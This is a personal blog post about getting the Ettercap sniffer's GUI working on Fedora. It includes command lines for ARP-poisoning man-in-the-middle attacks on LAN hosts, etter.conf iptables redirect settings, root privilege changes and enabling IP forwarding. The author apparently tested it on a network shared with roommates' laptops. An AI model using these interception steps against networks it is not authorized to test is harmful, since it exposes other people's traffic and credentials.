Ettercap is one of the best sniffing tools available to day, but when it comes to using it on non-security-distro's on which it is not pre-configured to use with like Fedora , you might land into some problems like me. It all started on a sunny day when I actually thought to try it on Fedora Linux.
PS : I wont be covering ncurses as its quite easy & offers little to no hassles in operations, gave me no errors in operation strangely.
Anyways..I installed ettercap it by typing -
[root@zion xero]#su Password: [root@zion xero]# yum install ettercap
[root@zion xero]# yum install ettercap-gui
( I actually had problems with this one..)
Yum resolved dependencies & installed it, I ran it on my local lan network assuming to run it on default configuration.
[root@zion xero]# ettercap -T -Q -M ARP //192.168.1.3
It successfully captured all the packets & I was able to get details about capturing. The real problems started when I started to run it on GUI mode.
[root@zion xero]# ettercap G
well, the gtk gui popped up & prompted me to the stuff. I quickly pressed shift + U to choose network interface ( in this case my local lan network hooked up to my roommates laptops ), & chose 'eth0' the default Ethernet interface. I went ahead by scanning for hosts by pressing "ctrl + s" & bam..it crashed.
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Ooops ! This shouldn't happen...
Please recompile in debug mode, reproduce the bug and send a bugreport
okay..I got it..it might need to be crashing cause it has not been updated since a long time. Ah well, I compromised it by scanning partially for hosts & then running it. Again, I chose the host, added it to my target,mitm & started ARP poisoning (using the menu) & then started with unified sniffing.
I got nothing.
Realizing it was not backtrack, I sensibly closed it ( rearping the network..not by deliberately closing it like windows users do by abusing the [X] button) & opened etter.conf
[root@zion xero]# vi /etc/etter.conf
& uncommented the iptables option to look like this
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
saved it, ran it again.
Again, the same drill, partial hosts scanning,target selection,mitm,arping,sniffing.
bang, I got nothing..again. I looked at the console output & found -
[root@zion xero]# ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
iptables v1.3.3: can't initialize iptables table `nat': Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded.
wow..I am running the program as root , edited the read only file as root & all i got was to upgrade my kernel ? bullshit! Anyways..back to etter.conf , this time I changed the privileges to 0
[privs] ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default
The program ran & the error went away :)
but still..i was unable to capture anything in the GUI mode, guess the more user friendly you make it, the more hassles you add with it...sheesh. I was into new stuff like after 10 minutes of waiting I got this -
SEND L3 ERROR: 44 byte packet (0800:06) destined to 192.168.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
great...now this was what I was talking about. Now this really got me moving. Its not like everyday when you can target a network in CUI using one command of a program but using a GUI has a lot of strings attached.
Now I did everything very carefully, although I was still not able to figure out the real reason of "Segmentation Fault problem" , but I guess everything works fine if you do it like this -
Configure etter.conf like I stated above, set uid to 0 & uncomment iptables section.
run ettercap using kdesu, yep ran it with elevated privileges in kde environment to avoid "cant initialize iptables error".
[root@zion xero]# kdesu ettercap -G
give your password , & choose network interface (shift + U).
Once done, please be patient, open a new terminal window, change to root & type this command (forwards packets, avoids error :P ) -
[root@zion xero]# echo "1" > /proc/sys/net/ipv4/ip_forward
it will avoid the "SEND L3 ERROR" . Once done, do your drill & you will be "finally" able to capture data using GUI. For the rest of elites out there, I guess
[root@zion xero]# ettercap -T -Q -M arp:remote -i eth0 /192.168.1.3/ //
seems to work :) man..what a trip.. I would choose wireshark over it anyday..
Happy new year once again..
Like This post ? You can buy me a Beer :)
Posted by XERO. ALL RIGHTS RESERVED.